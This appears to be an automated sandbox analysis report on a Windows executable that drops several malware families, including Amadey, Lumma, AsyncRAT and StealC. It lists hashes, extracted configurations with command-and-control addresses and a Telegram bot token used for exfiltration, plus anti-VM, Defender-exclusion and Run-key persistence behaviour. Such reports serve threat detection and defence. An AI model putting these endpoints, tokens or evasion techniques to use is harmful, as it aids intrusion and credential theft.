Analysis
-
max time kernel
105s -
max time network
121s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-12-2024 22:24
Static task
static1
General
-
Target
9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exe
-
Size
3.7MB
-
MD5
f0f4b98ed51ce5480a17b247e8c665bb
-
SHA1
36c3cc9d3b129006bdd661228ec2472e63e94aac
-
SHA256
9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893
-
SHA512
2ed4dcecc13dbd173a4a6827a3ee1bba1472c079ed504746dc5b88207ee2936d0da3dd3933028bc31d67e5eff91675d6df61b5a2b3ffc4fc83df51bcc5a2101d
-
SSDEEP
98304:PYOmI83F4FL1pXwxssU/sWvMhpp5RtgwaUAuCefHx:PYe0YLPAxssU/soMHRtgwaUAuvfHx
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://preside-comforter.sbs
https://savvy-steereo.sbs
https://copper-replace.sbs
https://record-envyp.sbs
https://slam-whipp.sbs
https://wrench-creter.sbs
https://looky-marked.sbs
https://plastic-mitten.sbs
https://hallowed-noisy.sbs
Extracted
asyncrat
Esco Private rat
Default
87.120.125.31:4449
tevyxodworhfwbnyl
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
gurcu
https://api.telegram.org/bot8121067342:AAFL-KN4aKsB4OBMVYX2uU3_ad7ylEISJbY/sendDocument?chat_id=7781867830&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan
Signatures
-
Amadey family
-
Asyncrat family
-
Gurcu family
-
Lumma family
-
Stealc family
-
Processes:
resource yara_rule behavioral1/files/0x0002000000021f4c-47.dat VenomRAT behavioral1/memory/1900-61-0x00000000003A0000-0x00000000003B8000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x0002000000021f4c-47.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
Processes:
aabe095923.exeb6e90f7d07.exe1u88t3.exeskotes.exe8cc247243e.exe23ee2d6bcc.exeskotes.exeskotes.exe2S9414.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aabe095923.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b6e90f7d07.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1u88t3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8cc247243e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 23ee2d6bcc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2S9414.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 4772 powershell.exe 6112 powershell.exe 3056 powershell.exe 2296 powershell.exe 212 powershell.exe 6612 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
aabe095923.exe8cc247243e.exe1u88t3.exeskotes.exeb6e90f7d07.exe23ee2d6bcc.exeskotes.exe2S9414.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aabe095923.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8cc247243e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1u88t3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b6e90f7d07.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 23ee2d6bcc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1u88t3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b6e90f7d07.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8cc247243e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2S9414.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aabe095923.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 23ee2d6bcc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2S9414.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
skotes.exe4aDoFRV.exe1u88t3.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 4aDoFRV.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 1u88t3.exe -
Executes dropped EXE 12 IoCs
Processes:
1u88t3.exeskotes.exe2S9414.exeskotes.exeIs4UWe7.exe4aDoFRV.exeaabe095923.exeb6e90f7d07.exefff4f46f92.exe8cc247243e.exe23ee2d6bcc.exeskotes.exepid Process 1164 1u88t3.exe 4488 skotes.exe 3840 2S9414.exe 1704 skotes.exe 1900 Is4UWe7.exe 4452 4aDoFRV.exe 2544 aabe095923.exe 2320 b6e90f7d07.exe 5028 fff4f46f92.exe 1988 8cc247243e.exe 5820 23ee2d6bcc.exe 5956 skotes.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
skotes.exeaabe095923.exeb6e90f7d07.exe23ee2d6bcc.exeskotes.exe1u88t3.exeskotes.exe2S9414.exe8cc247243e.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine aabe095923.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine b6e90f7d07.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 23ee2d6bcc.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 1u88t3.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 2S9414.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 8cc247243e.exe -
Loads dropped DLL 1 IoCs
Processes:
4aDoFRV.exepid Process 4452 4aDoFRV.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exeskotes.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aabe095923.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011429001\\aabe095923.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b6e90f7d07.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011430001\\b6e90f7d07.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fff4f46f92.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011431001\\fff4f46f92.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8cc247243e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1011432001\\8cc247243e.exe" skotes.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 65 ip-api.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/files/0x0008000000000733-295.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
1u88t3.exeskotes.exe2S9414.exeskotes.exeaabe095923.exeb6e90f7d07.exe8cc247243e.exe23ee2d6bcc.exepid Process 1164 1u88t3.exe 4488 skotes.exe 3840 2S9414.exe 1704 skotes.exe 2544 aabe095923.exe 2320 b6e90f7d07.exe 1988 8cc247243e.exe 5820 23ee2d6bcc.exe -
Drops file in Windows directory 1 IoCs
Processes:
1u88t3.exedescription ioc Process File created C:\Windows\Tasks\skotes.job 1u88t3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 4492 3840 WerFault.exe 85 1284 3840 WerFault.exe 85 3504 3840 WerFault.exe 85 4624 2544 WerFault.exe 124 -
System Location Discovery: System Language Discovery 1 TTPs 28 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exetaskkill.exe9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.execmd.execmd.exepowershell.exe1u88t3.exepowershell.exepowershell.exetaskkill.exeb6e90f7d07.execmd.exe8cc247243e.exepowershell.exeaabe095923.exepowershell.exefff4f46f92.exetaskkill.exetaskkill.exetaskkill.exe2S9414.execmd.exepowershell.exeskotes.execmd.exe23ee2d6bcc.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1u88t3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b6e90f7d07.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8cc247243e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aabe095923.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language fff4f46f92.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage fff4f46f92.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2S9414.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fff4f46f92.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 23ee2d6bcc.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exefirefox.exe4aDoFRV.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 4aDoFRV.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 4aDoFRV.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 4500 taskkill.exe 1768 taskkill.exe 4840 taskkill.exe 3716 taskkill.exe 2320 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
firefox.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
1u88t3.exeskotes.exe2S9414.exeskotes.exeIs4UWe7.exe4aDoFRV.exepowershell.exepowershell.exeaabe095923.exepowershell.exeb6e90f7d07.exepowershell.exepid Process 1164 1u88t3.exe 1164 1u88t3.exe 4488 skotes.exe 4488 skotes.exe 3840 2S9414.exe 3840 2S9414.exe 1704 skotes.exe 1704 skotes.exe 1900 Is4UWe7.exe 1900 Is4UWe7.exe 1900 Is4UWe7.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4452 4aDoFRV.exe 4404 powershell.exe 4404 powershell.exe 1900 Is4UWe7.exe 3056 powershell.exe 3056 powershell.exe 2544 aabe095923.exe 2544 aabe095923.exe 4772 powershell.exe 4772 powershell.exe 1900 Is4UWe7.exe 2320 b6e90f7d07.exe 2320 b6e90f7d07.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 1964 powershell.exe 1964 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Is4UWe7.exe4aDoFRV.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1900 Is4UWe7.exe Token: SeDebugPrivilege 4452 4aDoFRV.exe Token: SeDebugPrivilege 4404 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeDebugPrivilege 4772 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeIncreaseQuotaPrivilege 1964 powershell.exe Token: SeSecurityPrivilege 1964 powershell.exe Token: SeTakeOwnershipPrivilege 1964 powershell.exe Token: SeLoadDriverPrivilege 1964 powershell.exe Token: SeSystemProfilePrivilege 1964 powershell.exe Token: SeSystemtimePrivilege 1964 powershell.exe Token: SeProfSingleProcessPrivilege 1964 powershell.exe Token: SeIncBasePriorityPrivilege 1964 powershell.exe Token: SeCreatePagefilePrivilege 1964 powershell.exe Token: SeBackupPrivilege 1964 powershell.exe Token: SeRestorePrivilege 1964 powershell.exe Token: SeShutdownPrivilege 1964 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeSystemEnvironmentPrivilege 1964 powershell.exe Token: SeRemoteShutdownPrivilege 1964 powershell.exe Token: SeUndockPrivilege 1964 powershell.exe Token: SeManageVolumePrivilege 1964 powershell.exe Token: 33 1964 powershell.exe Token: 34 1964 powershell.exe Token: 35 1964 powershell.exe Token: 36 1964 powershell.exe Token: SeDebugPrivilege 1768 taskkill.exe Token: SeDebugPrivilege 2296 powershell.exe Token: SeIncreaseQuotaPrivilege 2296 powershell.exe Token: SeSecurityPrivilege 2296 powershell.exe Token: SeTakeOwnershipPrivilege 2296 powershell.exe Token: SeLoadDriverPrivilege 2296 powershell.exe Token: SeSystemProfilePrivilege 2296 powershell.exe Token: SeSystemtimePrivilege 2296 powershell.exe Token: SeProfSingleProcessPrivilege 2296 powershell.exe Token: SeIncBasePriorityPrivilege 2296 powershell.exe Token: SeCreatePagefilePrivilege 2296 powershell.exe Token: SeBackupPrivilege 2296 powershell.exe Token: SeRestorePrivilege 2296 powershell.exe Token: SeShutdownPrivilege 2296 powershell.exe Token: SeDebugPrivilege 2296 powershell.exe Token: SeSystemEnvironmentPrivilege 2296 powershell.exe Token: SeRemoteShutdownPrivilege 2296 powershell.exe Token: SeUndockPrivilege 2296 powershell.exe Token: SeManageVolumePrivilege 2296 powershell.exe Token: 33 2296 powershell.exe Token: 34 2296 powershell.exe Token: 35 2296 powershell.exe Token: 36 2296 powershell.exe Token: SeIncreaseQuotaPrivilege 2296 powershell.exe Token: SeSecurityPrivilege 2296 powershell.exe Token: SeTakeOwnershipPrivilege 2296 powershell.exe Token: SeLoadDriverPrivilege 2296 powershell.exe Token: SeSystemProfilePrivilege 2296 powershell.exe Token: SeSystemtimePrivilege 2296 powershell.exe Token: SeProfSingleProcessPrivilege 2296 powershell.exe Token: SeIncBasePriorityPrivilege 2296 powershell.exe Token: SeCreatePagefilePrivilege 2296 powershell.exe Token: SeBackupPrivilege 2296 powershell.exe Token: SeRestorePrivilege 2296 powershell.exe Token: SeShutdownPrivilege 2296 powershell.exe Token: SeDebugPrivilege 2296 powershell.exe Token: SeSystemEnvironmentPrivilege 2296 powershell.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
Processes:
1u88t3.exefff4f46f92.exefirefox.exepid Process 1164 1u88t3.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 5028 fff4f46f92.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe -
Suspicious use of SendNotifyMessage 31 IoCs
Processes:
fff4f46f92.exefirefox.exepid Process 5028 fff4f46f92.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 5028 fff4f46f92.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe 5028 fff4f46f92.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Is4UWe7.exefirefox.exepid Process 1900 Is4UWe7.exe 3408 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exe1u88t3.exeskotes.execmd.exe4aDoFRV.exepowershell.exedescription pid Process procid_target PID 976 wrote to memory of 1164 976 9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exe 83 PID 976 wrote to memory of 1164 976 9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exe 83 PID 976 wrote to memory of 1164 976 9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exe 83 PID 1164 wrote to memory of 4488 1164 1u88t3.exe 84 PID 1164 wrote to memory of 4488 1164 1u88t3.exe 84 PID 1164 wrote to memory of 4488 1164 1u88t3.exe 84 PID 976 wrote to memory of 3840 976 9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exe 85 PID 976 wrote to memory of 3840 976 9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exe 85 PID 976 wrote to memory of 3840 976 9eddc13417679ef715743574858a0010f1017eef771b24756e99e2ea0ce8b893.exe 85 PID 4488 wrote to memory of 1900 4488 skotes.exe 112 PID 4488 wrote to memory of 1900 4488 skotes.exe 112 PID 4488 wrote to memory of 4452 4488 skotes.exe 113 PID 4488 wrote to memory of 4452 4488 skotes.exe 113 PID 4488 wrote to memory of 2424 4488 skotes.exe 117 PID 4488 wrote to memory of 2424 4488 skotes.exe 117 PID 4488 wrote to memory of 2424 4488 skotes.exe 117 PID 2424 wrote to memory of 4328 2424 cmd.exe 119 PID 2424 wrote to memory of 4328 2424 cmd.exe 119 PID 2424 wrote to memory of 4328 2424 cmd.exe 119 PID 2424 wrote to memory of 4404 2424 cmd.exe 120 PID 2424 wrote to memory of 4404 2424 cmd.exe 120 PID 2424 wrote to memory of 4404 2424 cmd.exe 120 PID 4452 wrote to memory of 4260 4452 4aDoFRV.exe 121 PID 4452 wrote to memory of 4260 4452 4aDoFRV.exe 121 PID 4404 wrote to memory of 3056 4404 powershell.exe 123 PID 4404 wrote to memory of 3056 4404 powershell.exe 123 PID 4404 wrote to memory of 3056 4404 powershell.exe 123 PID 4488 wrote to memory of 2544 4488 skotes.exe 124 PID 4488 wrote to memory of 2544 4488 skotes.exe 124 PID 4488 wrote to memory of 2544 4488 skotes.exe 124 PID 4404 wrote to memory of 4772 4404 powershell.exe 126 PID 4404 wrote to memory of 4772 4404 powershell.exe 126 PID 4404 wrote to memory of 4772 4404 powershell.exe 126 PID 4488 wrote to memory of 2320 4488 skotes.exe 128 PID 4488 wrote to memory of 2320 4488 skotes.exe 128 PID 4488 wrote to memory of 2320 4488 skotes.exe 128 PID 4404 wrote to memory of 3508 4404 powershell.exe 56 PID 4404 wrote to memory of 784 4404 powershell.exe 8 PID 4404 wrote to memory of 3724 4404 powershell.exe 66 PID 4404 wrote to memory of 1752 4404 powershell.exe 30 PID 4404 wrote to memory of 1156 4404 powershell.exe 19 PID 4404 wrote to memory of 1548 4404 powershell.exe 27 PID 4404 wrote to memory of 1348 4404 powershell.exe 23 PID 4404 wrote to memory of 1148 4404 powershell.exe 18 PID 4404 wrote to memory of 5044 4404 powershell.exe 99 PID 4404 wrote to memory of 1536 4404 powershell.exe 26 PID 4404 wrote to memory of 1140 4404 powershell.exe 17 PID 4404 wrote to memory of 2912 4404 powershell.exe 52 PID 4404 wrote to memory of 2312 4404 powershell.exe 41 PID 4404 wrote to memory of 2900 4404 powershell.exe 51 PID 4404 wrote to memory of 1964 4404 powershell.exe 131 PID 4404 wrote to memory of 1964 4404 powershell.exe 131 PID 4404 wrote to memory of 1964 4404 powershell.exe 131 PID 4404 wrote to memory of 2892 4404 powershell.exe 50 PID 4404 wrote to memory of 1708 4404 powershell.exe 36 PID 4404 wrote to memory of 524 4404 powershell.exe 15 PID 4404 wrote to memory of 964 4404 powershell.exe 12 PID 4404 wrote to memory of 1504 4404 powershell.exe 25 PID 4404 wrote to memory of 1944 4404 powershell.exe 33 PID 4404 wrote to memory of 1696 4404 powershell.exe 29 PID 4404 wrote to memory of 4360 4404 powershell.exe 69 PID 4404 wrote to memory of 904 4404 powershell.exe 11 PID 4404 wrote to memory of 1296 4404 powershell.exe 22 PID 4404 wrote to memory of 2664 4404 powershell.exe 45 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵PID:784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:904
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:524
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1156
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1704
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
PID:5956
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1236
-
